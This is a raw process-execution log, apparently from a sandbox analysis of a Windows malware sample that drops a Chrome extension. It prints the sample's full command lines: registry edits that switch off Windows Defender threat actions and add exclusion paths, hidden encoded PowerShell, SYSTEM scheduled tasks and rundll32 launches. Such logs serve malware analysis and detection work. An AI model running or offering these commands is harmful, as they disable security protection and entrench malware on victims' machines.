C:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN\PfzJEsvfSkvLAaT\ekHGpuk.exeC:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN\PfzJEsvfSkvLAaT\ekHGpuk.exe 1c /Rysite_idjqB 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2680
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:2408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:3572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:1816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:3708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:4720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:3480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:2416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:3840
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GdxvlpYGnipdDYEVdBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GdxvlpYGnipdDYEVdBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NVRHnqqYuoKU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NVRHnqqYuoKU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PxtQEfdrU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PxtQEfdrU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\anbFGpaSVIJEC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\anbFGpaSVIJEC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wbWGHgMzMEUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wbWGHgMzMEUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\GpoJrohhsQtRLIVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\GpoJrohhsQtRLIVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WVcQpKJMvymSgqJu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WVcQpKJMvymSgqJu\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4388 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GdxvlpYGnipdDYEVdBR" /t REG_DWORD /d 0 /reg:323⤵PID:1748
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GdxvlpYGnipdDYEVdBR" /t REG_DWORD /d 0 /reg:324⤵PID:488
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GdxvlpYGnipdDYEVdBR" /t REG_DWORD /d 0 /reg:643⤵PID:4308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NVRHnqqYuoKU2" /t REG_DWORD /d 0 /reg:323⤵PID:4168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NVRHnqqYuoKU2" /t REG_DWORD /d 0 /reg:643⤵PID:1832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PxtQEfdrU" /t REG_DWORD /d 0 /reg:323⤵PID:4712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PxtQEfdrU" /t REG_DWORD /d 0 /reg:643⤵PID:3876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anbFGpaSVIJEC" /t REG_DWORD /d 0 /reg:323⤵PID:2968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anbFGpaSVIJEC" /t REG_DWORD /d 0 /reg:643⤵PID:3904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wbWGHgMzMEUn" /t REG_DWORD /d 0 /reg:323⤵PID:416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wbWGHgMzMEUn" /t REG_DWORD /d 0 /reg:643⤵PID:5008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\GpoJrohhsQtRLIVB /t REG_DWORD /d 0 /reg:323⤵PID:1116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\GpoJrohhsQtRLIVB /t REG_DWORD /d 0 /reg:643⤵PID:1284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN /t REG_DWORD /d 0 /reg:323⤵PID:4920
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN /t REG_DWORD /d 0 /reg:643⤵PID:1280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WVcQpKJMvymSgqJu /t REG_DWORD /d 0 /reg:323⤵PID:1660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WVcQpKJMvymSgqJu /t REG_DWORD /d 0 /reg:643⤵PID:3080
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gtjTwagny" /SC once /ST 02:17:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:2388
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gtjTwagny"2⤵PID:4984
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gtjTwagny"2⤵PID:1992
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uaXipkbyxrnNFDdtl" /SC once /ST 01:26:13 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WVcQpKJMvymSgqJu\MUUrhclBcrYRTMx\SmMwzrz.exe\" ix /NCsite_idkUS 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:880
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "uaXipkbyxrnNFDdtl"2⤵PID:3248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5112 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1680
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3672
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4596
-
C:\Windows\Temp\WVcQpKJMvymSgqJu\MUUrhclBcrYRTMx\SmMwzrz.exeC:\Windows\Temp\WVcQpKJMvymSgqJu\MUUrhclBcrYRTMx\SmMwzrz.exe ix /NCsite_idkUS 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2520 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bFvsKFifcttmubYYTU"2⤵PID:2864
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:3232
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:2964
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:1364
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:5008
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\PxtQEfdrU\jwcHzI.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "PhOAIbnrVHbfAsF" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2784
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PhOAIbnrVHbfAsF2" /F /xml "C:\Program Files (x86)\PxtQEfdrU\cDEcGqh.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4316
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "PhOAIbnrVHbfAsF"2⤵PID:1576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "PhOAIbnrVHbfAsF"2⤵PID:3804
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BvVMKipBdWAwln" /F /xml "C:\Program Files (x86)\NVRHnqqYuoKU2\XiLmsox.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3608
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "sqrENAmEqIKJh2" /F /xml "C:\ProgramData\GpoJrohhsQtRLIVB\sZFzzoq.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3044
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VTlLlXStzcemBOQJR2" /F /xml "C:\Program Files (x86)\GdxvlpYGnipdDYEVdBR\EKXRRCX.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4720
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "clmhxVoXaGQTfUbdAgH2" /F /xml "C:\Program Files (x86)\anbFGpaSVIJEC\nXVfUMj.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1992
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xOSrYfgHudgkQpnQd" /SC once /ST 00:04:46 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WVcQpKJMvymSgqJu\LRILxDNM\qVSacXy.dll\",#1 /nOsite_idqBf 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4916
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "xOSrYfgHudgkQpnQd"2⤵PID:4004
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:2432
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:3664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:3256
-
